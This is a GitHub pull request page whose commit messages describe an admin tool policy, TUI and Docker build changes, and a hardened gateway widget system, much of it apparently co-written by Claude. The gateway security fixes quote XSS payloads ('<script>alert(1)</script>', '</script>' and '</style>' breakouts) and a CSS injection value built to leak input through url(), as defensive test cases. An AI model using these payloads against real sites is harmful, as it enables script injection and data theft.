chore: promote staging to staging-promote/9399fccc-24203835221 (2026-04-09 18:19 UTC) - #2213
Merged
henrypark133 merged 37 commits intoApr 10, 2026
Conversation
* feat(admin): admin tool policy to disable tools for users (#2078) Adds the ability for admins to disable specific tools (e.g. build_software, tool_install, skill_install) for all non-admin users or specific users in multi-tenant deployments. - AdminToolPolicy stored in settings table under __admin__ scope - GET/PUT /api/admin/tool-policy endpoints (admin-only, multi-tenant gated) - Enforcement in dispatcher before_llm_call strips disabled tools from LLM context - Admin users are exempt from the policy Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: enforce admin tool policy across all execution paths - Extract inline filtering into shared `filter_admin_disabled_tools()` helper - Apply in JobDelegate and ContainerDelegate (not just ChatDelegate) - Change from fail-open to fail-closed: DB errors return empty tool list - Log warnings on deserialization failures instead of silent fallback - Add `multi_tenant` field to WorkerDeps for job-level enforcement - Add `db()` accessor to SystemScope for system-level DB access Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: tighten admin tool policy review follow-ups * fix(admin-policy): enforce ordering and add dispatcher e2e regression * fix(admin-policy): address review feedback — encapsulate DB access, cache policy, strengthen validation - Remove raw `SystemScope::db()` accessor; add purpose-built `get_admin_tool_policy()`, `set_admin_tool_policy()`, `get_user_role()` methods to preserve tenant isolation boundary - Canonicalize admin role detection: add `UserRole::is_admin()` helper, replace string comparisons in engine.rs and role enum comparisons across dispatcher/job delegates with the single canonical path - Cache admin tool policy per agentic loop via `AdminToolPolicyCache` (tokio::sync::OnceCell) to avoid DB reads on every LLM iteration - Switch `disabled_tools` from Vec<String> to HashSet<String> for O(1) lookups - Extract shared `validate_admin_tool_policy()` with tool name format checks, user key validation, and 32KB max payload size; deduplicate from HTTP handler - Add `parse_admin_tool_policy()` helper with tracing::warn on deserialization failure (was silently falling back to default) - Document PUT endpoint's last-write-wins replacement semantics - Add regression tests: path-like tool names, invalid user keys, oversized policy, and E2E test verifying disabled tools don't reach the LLM Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(admin-policy): entry count caps, fail-closed GET, dispatch-exempt annotation - Add entry count limits: 1000 global disabled tools, 1000 user keys, 1000 per-user entries — prevents multi-MB policy payloads - GET handler now returns 500 on corrupt stored policy instead of silently falling back to empty default (fail-closed, consistent with enforcement) - Add dispatch-exempt annotation explaining why these admin handlers access state.store directly (consistent with users/secrets/tokens handlers) - Remove redundant debug_assert_ne in users_create_handler (runtime guard already covers both debug and release builds) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(admin-policy): merge staging, add inline dispatch-exempt annotations Merge staging to pick up ToolDispatcher (#2049) and the "everything goes through tools" pre-commit check. Add inline // dispatch-exempt: annotations on the state.store access lines so the pre-commit check passes. These handlers are admin-only infrastructure operating on a cross-tenant policy scope — consistent with other admin handlers that haven't been migrated to the dispatcher yet. Also fix post-merge compilation: add auth_manager and tool_dispatcher fields to test struct initializers. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(admin-policy): satisfy per-line dispatch-exempt check on all state.* accesses The pre-commit hook (scripts/pre-commit-safety.sh) checks each added line that touches state.{store,workspace_pool,...} for a trailing // dispatch-exempt: comment on the same physical line. The previous annotations were either: - on the workspace_pool lines: missing entirely - on the store.as_ref().ok_or(( lines: rustfmt-broken because the trailing comment was placed inside the tuple, where the per-line check no longer matches it Lift each state.workspace_pool / state.store access into a dedicated local binding that carries the trailing dispatch-exempt comment, so the annotation survives cargo fmt and the per-line hook regex matches. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Co-authored-by: Illia Polosukhin <ilblackdragon@gmail.com>
* feat(tui): ship TUI in default binary Add `tui` to default Cargo features so the Ratatui terminal UI is included in standard builds. The TUI only activates when explicitly configured at runtime (`config.channels.tui`), so server deployments are unaffected — the deps compile in but nothing initializes. Also remove `dist = false` from ironclaw_tui so cargo-dist includes it in release artifacts. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(tui): make arboard/clipboard optional to support headless builds arboard requires X11/Wayland dev headers on Linux, breaking builds in minimal Docker images and headless CI runners. Move arboard and image behind an opt-in `clipboard` feature (defaulted on) so headless builds can exclude them while desktop builds keep full clipboard support. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat(docker): pre-bundle WASM extensions in staging image Add a wasm-builder Docker stage that builds all registry tool/channel extensions from source and copies the .wasm + .capabilities.json files into the staging runtime image. Production images are unaffected — Docker only builds the wasm-builder stage when --target runtime-staging is used. The docker.yml workflow passes --target runtime-staging for scheduled (staging) builds and workflow_dispatch with tag=staging, while all other builds use --target runtime (no extensions). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(docker): address PR review feedback - Use COPY --chown instead of separate RUN chown layer (fewer layers) - Reorder stages so runtime (production) is last — bare docker build defaults to production, not staging - Use --locked when Cargo.lock is present for reproducible WASM builds Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(wasm): upgrade wasmtime to 43.0.1 * chore(wasm): align wasmparser with wasmtime deps
…2219) Add railway.toml with target = "runtime-staging" so Railway builds the Docker target that includes all WASM tool/channel extensions. All Railway environments deploy from the staging branch and benefit from having extensions pre-installed. Depends on the runtime-staging Dockerfile target added in #2210. Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(ci): resolve 3 staging test failures - Add V21-V23 checksums to migrations/checksums.lock (missed in #2049) - Guard telegram token URL test with ENV_MUTEX to prevent env var race - Call setAuthFlowPending before early return in handleAuthRequired Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(test): use ScopedEnvVar for env cleanup in telegram token test Replaces bare unsafe remove_var with ScopedEnvVar::set("") which holds ENV_MUTEX and restores the previous value on drop, avoiding state leakage into subsequent tests. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…nify extension config modal (#2172)
ARG alone doesn't invalidate layers on BuildKit unless referenced. Add a RUN that echoes the value before the expensive WASM build step. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Added a QA Bug Report template for issue tracking during testing.
…ith widget system (#1725) * feat(frontend): extract frontend into ironclaw_frontend crate with widget extension system Moves all frontend static assets (app.js, style.css, index.html, i18n/*, theme-init.js, favicon.ico) from src/channels/web/static/ into a dedicated ironclaw_frontend crate. The crate also adds: - Layout configuration types (branding, tab order, chat features, per-widget config) - Widget manifest types with named slot system (tab, chat_header, sidebar, etc.) - CSS scoping utility (auto-prefixes selectors with [data-widget="id"]) - Bundle assembly (injects layout config, widgets, and custom CSS into HTML) - Frontend API endpoints (GET/PUT layout, list widgets, serve widget files) - Browser-side IronClaw.registerWidget() API with authenticated fetch, event subscription, theme access, and i18n Widgets are stored in workspace at frontend/widgets/{id}/ and served via the API. Layout config is stored at frontend/layout.json. The agent can create/edit both using existing memory_write/memory_read tools. Gateway handlers now reference ironclaw_frontend::assets constants instead of include_str!() with local paths, completing the separation. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: address CI failures — license, rust-version, formatting, manifest warnings - Add license = "MIT OR Apache-2.0" to ironclaw_frontend Cargo.toml (cargo-deny) - Fix rust-version to 1.92 to match other crates - Log warning for invalid widget manifests instead of silent skip - Run cargo fmt across all files Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): structured data cards + chat renderer API for rich message rendering Agent responses containing JSON/structured data (like mission results, status objects) now render as styled cards with labeled fields, status badges, and monospaced IDs instead of raw text. Built-in rendering: - Detects inline JSON objects (including Python-style single quotes) - Renders as data cards with key-value rows - Status/state fields get colored badges (success/error/pending) - UUIDs rendered in monospace Extensible via widgets: - IronClaw.registerChatRenderer({ id, match, render, priority }) - First matching renderer wins (priority ordering) - Renderer gets the content element to mutate in place Also adds ChatRenderer variant to WidgetSlot enum. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): hash-based URL navigation for page refresh persistence Navigation state is now encoded in window.location.hash so refreshing the page (or sharing a URL) restores the current view: #/chat → chat tab, assistant thread #/chat/{threadId} → specific conversation #/memory/{path/to/file} → memory browser with file open #/jobs/{jobId} → job detail view #/routines/{id} → routine detail view #/settings/{subtab} → settings sub-tab (extensions, etc.) #/logs → logs tab Hooked into all navigation functions: switchTab, switchThread, switchToAssistant, createNewThread, readMemoryFile, openJobDetail, closeJobDetail, openRoutineDetail, closeRoutineDetail, switchSettingsSubtab. Thread restore is deferred until loadThreads() completes (async), then the pending thread ID is matched against the loaded thread list. Browser back/forward buttons work via hashchange listener. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): auto-open README.md when first visiting Memory tab Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): preserve URL hash across page refresh Two bugs caused the hash to reset on Cmd+R: 1. Auth URL cleanup (replaceState) stripped the hash fragment — now preserves it via cleaned.hash 2. restoreFromHash() called switchTab() which called updateHash() overwriting the full hash before the detail was restored — now suppresses hash updates during the entire restore sequence Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): seed frontend/README.md with customization guide for agent The agent didn't know it could customize the frontend via workspace writes. Now seeds frontend/README.md on first boot with a guide covering: - Layout config (branding, colors, tab order) via frontend/layout.json - Custom CSS via frontend/custom.css with common variable names - Widget creation (manifest + index.js + style.css) - API endpoints Also seeds frontend/.config with skip_indexing: true so frontend assets aren't chunked/embedded for search. When a user says "change the color scheme to red", the agent can now discover frontend/README.md via memory_tree, read the guide, and write the appropriate layout.json or custom.css. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): wire workspace-aware serving for index.html and style.css The index_handler and css_handler now read from workspace to apply frontend customizations on page load: - index_handler: reads frontend/layout.json, discovers widgets in frontend/widgets/*, reads frontend/custom.css, then calls assemble_index() to inject branding colors, layout config, widget scripts, and custom CSS into the base HTML. Falls back to embedded HTML if no customizations exist. - css_handler: appends frontend/custom.css from workspace after the embedded base stylesheet. This completes the end-to-end flow: Agent writes frontend/layout.json → user refreshes → sees changes Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): wire up remaining widget system gaps Audit-driven fixes for the widget extension system: 1. Widget tab panel ID: panels now get id="tab-{widgetId}" so switchTab() can find and activate them 2. Widget JS auth: inline widget JS in assembled HTML instead of <script src> to protected endpoint (browser script tags can't send Authorization headers) 3. Layout config: fully implement tab ordering, default_tab, chat.suggestions, chat.image_upload application 4. SSE event forwarding: wrap EventSource.addEventListener to intercept all named events and dispatch to widget subscribers via IronClaw.api._dispatch() Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): XSS prevention, widget queue drain, code-block false positives Security (2 XSS fixes): 1. HTML-escape branding title in assemble_index() to prevent <script>alert(1)</script> injection via layout.json 2. Escape </script> in inlined widget JS to prevent script tag breakout — uses <\/script> replacement 3. Escape widget IDs in HTML attributes via escape_html_attr() Correctness: 4. Drain _widgetInitQueue after DOM is ready — widgets registered before tab-bar exists now mount correctly instead of silently failing 5. Skip inline <code> elements in upgradeInlineJson to prevent false-positive JSON card rendering on code spans like <code>{key: value}</code> 6. Document scope_css limitation with nested @media rules Tests (13 new): - XSS: title injection escaped, widget JS </script> breakout escaped, widget ID attribute escaped - Edge cases: escape_html basic, escape_html_attr quotes, missing head/body tags, empty widget JS, whitespace-only custom CSS skipped - Widget: at-rule not prefixed, declarations preserved, special chars in widget ID, all slot variants round-trip, minimal manifest [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * style: fix clippy — collapsible if, while_let_on_iterator Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(ci): resolve frontend clippy and formatting failures * fix(frontend): address PR review — XSS, scope_css, cache, dedup Security (3 XSS gaps): 1. Layout JSON injected into <script>window.__IRONCLAW_LAYOUT__</script> is now run through escape_tag_close() — serde_json does not escape `<` or `/`, so a branding title containing `</script>` previously broke out of the script tag. Case-insensitive, UTF-8 safe. 2. Widget CSS and custom CSS injected into <style> tags are now escaped the same way against `</style>` breakouts. 3. New escape_tag_close() helper handles `</script`/`</style` uniformly (case-insensitive with tail preserved, via char-boundary walk). Correctness: 4. scope_css now tracks brace depth via a stack that distinguishes rule lists from declaration blocks. Selectors nested inside @media, @supports, @container, @layer, @document, @scope are recursively scoped. @keyframes/@font-face/@page bodies pass through opaque so inner keyframe selectors (0%, 100%) are not prefixed. The old single-bool parser produced unbalanced output on any nested rule. 5. WidgetInstanceConfig.enabled now defaults to true (via serde_default + manual Default impl). A layout entry that omits `enabled` while setting `config` no longer silently disables the widget. 6. build_frontend_html short-circuit replaced with a layout_has_customizations() helper covering all branding/tabs/chat fields. The old boolean missed subtitle, logo_url, favicon_url, default_tab, image_upload. 7. Custom CSS is now served only via /style.css (css_handler). Removed from FrontendBundle injection to prevent double-application. 8. Dead pub index_handler/css_handler/js_handler in handlers/static_files.rs removed — routes use private handlers in server.rs that need GatewayState. 9. Widget file path validation is now component-based via is_safe_segment / is_safe_relative_path. Rejects `.`, `..`, empty, `/`, `\`, NUL in any component, plus leading `/`. MIME detection is case-insensitive and adds .mjs / .map. 10. Layout and widget-manifest parse errors now log tracing::warn! instead of silently falling back. Extension system follow-ups: 11. Extracted shared widget-loading helpers (load_widget_manifests, load_resolved_widgets, read_widget_manifest) in handlers/frontend.rs. frontend_widgets_handler and build_frontend_html both delegate, so widget discovery exists in exactly one place. 12. New FrontendHtmlCache in GatewayState. Cache key is derived from the updated_at of frontend/layout.json and the frontend/widgets/ directory (max child mtime) via a single list("frontend/") call. A cache hit skips reading every widget manifest/JS/CSS per request. Edits invalidate naturally because list() sees the newer timestamp. Cache survives rebuild_state() by cloning the Arc. 13. upgradeInlineJson rewritten without the nested-quantifier regex. New _findJsonCandidates does a linear bracket scan that respects string literals and fast-skips <code>/<pre> regions. Three hard caps bound worst-case work (MAX_PARA_LEN=20000, MAX_SCAN=5000, MAX_CANDIDATES=32), eliminating the catastrophic-backtracking risk. Tests (29 new): - bundle.rs: 5 — layout JSON / widget CSS / custom CSS <script>/<style> breakouts, escape_tag_close case-insensitive, multi-byte safety - widget.rs: 5 — @media inner selector scoped, nested @supports+@media, @keyframes passthrough, sibling rules in @media, complex mix brace balance - layout.rs: 3 — enabled defaults true, Default impl enabled, explicit false respected - handlers/frontend.rs: 4 — segment allows/rejects, relative path allows/rejects (traversal, backslash, encoded separators) Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test --lib -p ironclaw_frontend -p ironclaw → 4171 main + 43 frontend tests pass [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: post-merge — PairingStore::new_noop, CLI snapshot, docs Merge of origin/staging surfaced three small follow-ups: 1. src/channels/wasm/wrapper.rs — PairingStore::new() signature changed in staging to take (db, cache). Switch the test call site to PairingStore::new_noop() to match other tests in the file. 2. src/cli/snapshots/..long_help_output_without_import.snap — accept the new snapshot. Clap's render_long_help for --auto-approve now emits an indented blank line between the short and long description; this test was already failing on staging tip (see Staging CI run 24021660555) so the snapshot update was needed regardless of this PR. 3. src/workspace/seeds/FRONTEND.md — address new copilot comments: - Placeholder is `{id}` (matches API path segment and manifest id field), not `{name}`. - Only `slot: "tab"` is actually mounted by the browser runtime. Trim the slot list to what's implemented and mention IronClaw.registerChatRenderer() for inline rendering. The extra WidgetSlot variants stay in the Rust API for forward compatibility but are no longer advertised to users until mounting is wired. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor: rename ironclaw_frontend → ironclaw_gateway, .system/gateway/ workspace Two coupled renames to align frontend assets with the broader `.system/` namespace introduced by other in-progress work: 1. Workspace folder: `frontend/` → `.system/gateway/` - layout.json, custom.css, widgets/{id}/, README.md, .config all move under `.system/gateway/` - LAYOUT_PATH and WIDGETS_DIR are now constants in the handler so a future move is a one-line change - is_config_path test updated to use the new path - FRONTEND.md seed rewritten to point at `.system/gateway/` - Cache key doc comments updated to match - No legacy or migration shim — this never shipped to prod 2. Crate: `ironclaw_frontend` → `ironclaw_gateway` - Matches how the surrounding subsystem is called (`channels/web` is "the gateway"). Cleaner mental model: workspace folder, crate name, and module name all align. - Directory renamed via `git mv` so history is preserved. - Cargo.toml workspace member + dependency updated; package name updated; description tweaked to "gateway frontend assets". - All `use ironclaw_frontend::` imports rewritten in server.rs and handlers/frontend.rs. - Doctest in widget.rs updated to use the new crate name. - Cargo.lock regenerated. The HTTP API paths stay as `/api/frontend/*` since they're a public surface; only the internal workspace path and crate name moved. Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test -p ironclaw_gateway → 43 unit + 1 doctest pass - cargo test --lib -p ironclaw → 4228 pass (8 unrelated IPv6/DNS validation failures, also failing on clean post-merge baseline) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): per-request CSP nonce for inlined widget scripts Copilot review caught that `assemble_index()` injects two kinds of inline `<script>` blocks (the layout-config script and per-widget module scripts), but the gateway's CSP sets `script-src 'self' …CDNs…` with no `'unsafe-inline'` and no nonce — so the browser silently blocks every injected script the moment any customization is enabled. The widget runtime would never execute on a customized index page. Fix uses a per-request CSP nonce (W3C standard pattern): - `crates/ironclaw_gateway/src/bundle.rs` - New `NONCE_PLACEHOLDER` sentinel constant, re-exported from the crate root - `assemble_index()` stamps `nonce="__IRONCLAW_CSP_NONCE__"` on every injected `<script>` tag (both the layout-config script and each widget's module script) - Inline `<style>` blocks deliberately do NOT carry a nonce — the gateway's CSP allows `'unsafe-inline'` for `style-src`, so adding one would be dead weight; pinned with a regression test - Three new tests verify the placeholder appears on layout + widget scripts and is absent on widget styles - `src/channels/web/server.rs` - Static CSP layer now reads from a single `BASE_CSP` constant so the static and per-response variants stay in lock-step - New `build_csp_with_nonce(nonce)` produces the same CSP with `'nonce-{nonce}'` added to script-src, preserving the explicit CDN list and the strict `style-src 'self' 'unsafe-inline' …` policy - New `generate_csp_nonce()` returns 16 random bytes hex-encoded via OsRng — same primitive `tokens_create_handler` already uses - `index_handler` now returns `Response` (not `impl IntoResponse`) so it can branch: - Workspace has no customizations → serve embedded `INDEX_HTML` unchanged; the static CSP layer applies (no inline scripts to authorize anyway) - Workspace has customizations → generate fresh nonce, replace placeholder in cached HTML, and emit a per-response `Content-Security-Policy` header with the nonce. Setting the header here suppresses the global `if_not_present` layer for this response only. - Two new unit tests pin the nonce-source position in script-src and the format/uniqueness of `generate_csp_nonce()` The HTML cache still works because the cached HTML contains the placeholder (not the actual nonce); per-request substitution preserves caching while the browser still sees a unique nonce on every page load. Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test -p ironclaw_gateway → 46 pass (+3 nonce tests) - cargo test --lib -p ironclaw → 4238 pass (+2 CSP tests) Refs: PR #1725 review by copilot-pull-request-reviewer [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): wire ko.js asset through ironclaw_gateway::assets The merge of staging brought in a Korean i18n pack referenced via include_str!("static/i18n/ko.js") in src/channels/web/server.rs. After the gateway extraction the static/ directory moved into crates/ironclaw_gateway/static/, so the legacy include_str! path no longer resolved. Add I18N_KO_JS to ironclaw_gateway::assets and make the i18n_ko_handler reference it like the other language packs. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): add Playwright coverage for chat-driven frontend customization Adds two end-to-end scenarios for the widget extension system shipped in PR #1725, both driven by talking to the agent in chat: 1. **Tab bar to left side panel.** The user asks the agent to move the tab bar; the mock LLM emits a `memory_write` tool call writing `.system/gateway/custom.css`, and after a reload the test asserts the served stylesheet contains the overlay, the computed flex-direction of `.tab-bar` is `column`, and the bar is now taller than it is wide. 2. **Workspace-data widget.** The user asks the agent to create a "Skills" widget that renders workspace skills. Two chat turns write `.system/gateway/widgets/skills-viewer/manifest.json` and `index.js` into the workspace. After a reload the test verifies the new tab button appears in `.tab-bar`, switches to it, waits for the widget's `data-testid="skills-viewer-root"` to mount, and asserts the widget actually fetched `/api/skills` (no `skills-viewer-error` marker) and that the panel carries the `data-widget="skills-viewer"` attribute the gateway runtime stamps for CSS isolation. Both tests share a `clean_customizations` fixture that wipes the workspace overlay files before and after each run so the session-scoped gateway server stays isolated across tests in the file (`memory_write` treats empty content as effectively cleared, and the gateway skips empty / unparseable widget files silently). Supporting changes: - **mock_llm.py**: three new `TOOL_CALL_PATTERNS` (`customize: move tab bar to left`, `customize: create skills viewer manifest`, `customize: install skills viewer code`) that emit one `memory_write` call per turn — the existing one-tool-per-response shape is preserved. - **app.js (`_addWidgetTab`)**: fix a latent bug where widget tabs would be queued forever because the function looked for a `.tab-content` / `#tab-content` element that the gateway HTML never ships. The built-in tab panels live as siblings of `.tab-bar` inside `#app`, so we now resolve the parent off the first existing `.tab-panel` (with `#app` as a final fallback). Without this fix the Skills widget tab never mounts and the second scenario can't pass. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): support multi tool calls per response in mock_llm The mock LLM previously emitted at most one tool call per assistant turn. That shape silently bypasses the v2 engine and CodeAct dispatch paths, where a single response can fan out into several parallel tool calls (or several Python helper invocations from one script). Tests written against that constraint were either contorted into multiple chat turns or quietly failed to cover multi-call regressions. Changes: - ``TOOL_CALL_PATTERNS`` args functions may now return ``list[dict]`` instead of a single ``dict``. Each item is its own ``{"tool_name", "arguments"}`` pair, so one trigger can mix several tools in one response. ``_normalize_tool_calls`` always wraps the return value into a list so the dispatcher stays shape-agnostic. - ``match_tool_call`` returns ``list[dict] | None``. - ``_tool_call_response`` and ``_stream_tool_call`` now accept either a single dict (legacy callers) or a list. The streaming path emits per-tool-call header + arguments chunks with distinct ``index`` values, exercising clients' per-index merging logic the same way real providers force them to. - ``_find_tool_results`` collects every fresh ``role: tool`` message after the most recent user turn (not just the first), and the chat-completion summary path renders a multi-line acknowledgment when more than one tool ran in a single turn. The single-result helper is kept as a thin shim for the special-response path. - The PR #1725 customization scenario is consolidated: instead of three separate triggers (one memory_write each), the ``customize: install skills viewer widget`` trigger now emits *both* the manifest and ``index.js`` writes in one assistant turn. The ``customize: move tab bar to left`` trigger stays single-call to cover the legacy code path. The Playwright test in ``test_widget_customization.py`` is updated to a single chat turn for the widget install — if the v2 engine ever drops the second parallel call, the test will fail because the new tab can't mount without both files. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 review feedback Four issues raised in the 2026-04-07 review pass: 1. **Widget id / directory mismatch** (`src/channels/web/handlers/frontend.rs`). `read_widget_manifest` now rejects widgets whose `manifest.id` does not match the on-disk directory name. The loader uses the directory name to compute file paths (`{WIDGETS_DIR}{dir}/index.js`) while the layout-config gating and the public `/api/frontend/widget/{id}/{*file}` endpoint key off `manifest.id`. When those drift, code can be mounted from one folder under a different id and the file API silently 404s — a correctness footgun for widget authors and a path-confusion attack surface for the serving handler. Fix lives in the shared helper so both `load_resolved_widgets` and `load_widget_manifests` get it. Adds regression tests for both the rejection and the matching path. 2/3. **`memory_write` doc examples used the wrong parameter name** (`src/workspace/seeds/FRONTEND.md`). The seeded customization guide showed `memory_write path=".system/gateway/..."`, but the actual tool parameter is `target` (`src/tools/builtin/memory.rs`). As written the examples wouldn't work if copy-pasted into a tool call. Both examples (layout.json + custom.css) updated to `target=`. 4. **`css_handler` allocated on the hot path** (`src/channels/web/server.rs`). The handler always called `assets::STYLE_CSS.to_string()` in the no-overlay branches, copying the entire embedded stylesheet on every request. Switched the local to `Cow<'static, str>` so the common path borrows the static string and only the overlay branch pays for an owned `format!`. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web::handlers::frontend` — 6 passed (4 existing + 2 new regression tests) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 paranoid-architect review Five issues raised in the 2026-04-07 review pass: 1. **High — `</style>` breakout XSS in branding CSS-vars injection** (`crates/ironclaw_gateway/src/bundle.rs`). Every other inline injection point in `assemble_index()` runs through `escape_tag_close`, but the branding `<style>` block formatted directly. A hostile color value containing `</style>` could close the tag early and inject HTML. Now wraps `css_vars` in `escape_tag_close(&css_vars, "</style")` for defense in depth, with a regression test in `test_assemble_index_branding_style_breakout_escaped`. 2. **Medium — CSS property injection via unvalidated branding colors** (`crates/ironclaw_gateway/src/layout.rs`). `to_css_vars()` interpolated `primary` / `accent` strings raw into `--color-primary: {};`, letting a hostile `layout.json` break out of the `:root {}` block (e.g. `red; } .chat-input[value^="s"] { background: url(...) }`). Added `is_safe_css_color()` validator that accepts hex literals, modern functional notation including `rgb(0 0 0 / 50%)`, and bare named colors, while rejecting `;`, `{}`, `<>`, quotes, backslash, `*` (handles both `/*` and `*/` comment markers), `url(...)`, and unknown functions. `to_css_vars()` silently drops invalid values so the rest of the branding config still applies. Six new unit tests cover the accepted forms, the injection vectors, and the `to_css_vars` drop. 3. **Medium — CSP policy duplication risks silent drift** (`src/channels/web/server.rs`). `BASE_CSP` and `build_csp_with_nonce` re-hardcoded every directive independently, so adding a `connect-src` to one would silently leave the other on the old policy. Extracted per-directive constants (`STYLE_SRC`, `FONT_SRC`, `CONNECT_SRC`, `IMG_SRC`, `FRAME_SRC`, `FORM_ACTION`) and built both flavors via a single `build_csp(nonce: Option<&str>)` helper. `BASE_CSP_HEADER` is now a `LazyLock<HeaderValue>` (with a safe minimal fallback to honor the no-`.expect()` rule on the request path). Added two regression tests: `test_base_and_nonce_csp_agree_outside_script_src` strips the `script-src` directive from both flavors and asserts byte equality, and `test_base_csp_header_matches_build_csp_none` locks the lazy header to `build_csp(None)`. 4. **Medium — `_wipe_customizations` ignored HTTP status** (`tests/e2e/scenarios/test_widget_customization.py`). The cleanup posts now assert `status_code == 200` with `resp.text` in the message, so an auth/server failure surfaces immediately instead of bleeding leftover workspace state into the next test. 5. **Drive-by — pre-existing flake in `test_telegram_token_colon_preserved _in_validation_url`** (`src/extensions/manager.rs`). The test reads `IRONCLAW_TEST_TELEGRAM_API_BASE_URL` via `telegram_bot_api_url` without taking the `lock_env()` mutex, so when a parallel test holds the override the read races and the assertion sees `http://127.0.0.1:.../bot…` instead of `https://api.telegram.org/`. The new tests in this PR changed scheduling enough to surface the race on every run. Fixed by acquiring the same `ScopedEnvVar` lock and clearing the override inside the test, making it deterministic. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib` — 4284 passed - `cargo test -p ironclaw_gateway` — 50 unit + 1 doctest passed (was 46) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * ci: nudge workflows for b88d4554 (Actions trigger missed) * fix(gateway): address PR #1725 zmanian review Five items raised in zmanian's 2026-04-08 review (approved). None are blockers; this sweep avoids carrying them as follow-up debt. 1. **Document widget trust model** (`src/workspace/seeds/FRONTEND.md`). New "Security model" section spells out that widgets run with full session authority via `IronClaw.api.fetch`, share the same DOM as the built-in tabs, and are *not* sandboxed at the JS layer. The trust boundary lives one layer up: anything that can `memory_write` a widget file already has agent authority. Operators who want stricter isolation should mount untrusted UI in an `<iframe sandbox>` from a trusted widget. 2. **Extract shared `read_layout_config` helper** (`src/channels/web/handlers/frontend.rs`, `src/channels/web/server.rs`). Both `frontend_layout_handler` and `build_frontend_html` had identical read-parse-fallback bodies — the kind of drift trap zmanian flagged. Hoisted the helper into `handlers/frontend.rs` as `pub async fn read_layout_config`; `server.rs` deletes its private copy and imports the shared one. The single source of truth means a future change to the warning text or fallback semantics lands once. 3. **Escape `def.id` and `e.message` in `_addWidgetTab` error path** (`crates/ironclaw_gateway/static/app.js`). The catch block built the failure banner via `innerHTML` with raw interpolation. CSP blocks the script vector, but every other innerHTML write in this file routes user-controlled strings through `escapeHtml()`, and an inconsistent escape discipline is exactly the kind of regression future readers shouldn't have to re-litigate. Now wraps both `def.id` and `String(e?.message ?? e)` in `escapeHtml`. 4. **Gate `upgradeInlineJson` behind opt-in flag** (`crates/ironclaw_gateway/src/layout.rs`, `crates/ironclaw_gateway/static/app.js`, `src/channels/web/server.rs`). The bracket-counting heuristic pattern-matches any balanced `{...}` in rendered markdown — prose like `"set the value to {x: 1, y: 2}"` gets mangled into a styled data card. New `ChatConfig::upgrade_inline_json: Option<bool>` defaults to `None` (off); operators that pipe structured data through chat can flip it on via `.system/gateway/layout.json`. `app.js` checks `window.__IRONCLAW_LAYOUT__.chat.upgrade_inline_json === true` before invoking the rewrite. Also added the field to `layout_has_customizations` so a layout that only sets this flag still triggers the customized HTML path. Two new `ironclaw_gateway` tests pin the default-off serde shape and the explicit-true round-trip (omitted field must not appear in serialized output). 5. **ETag cache-busting on `/style.css`** (`src/channels/web/server.rs`). Operators editing `custom.css` had to ask users to hard-refresh because the response carried only `Cache-Control: no-cache` with no validator. Added `css_etag()` producing a strong `"sha256-…"` validator over the assembled body (16 hex chars / 64 bits — plenty for content addressing on a single-tenant CSS payload). `css_handler` now extracts the request `HeaderMap`, honors `If-None-Match` (exact match or `*`) with a `304 Not Modified` + empty body, and otherwise emits 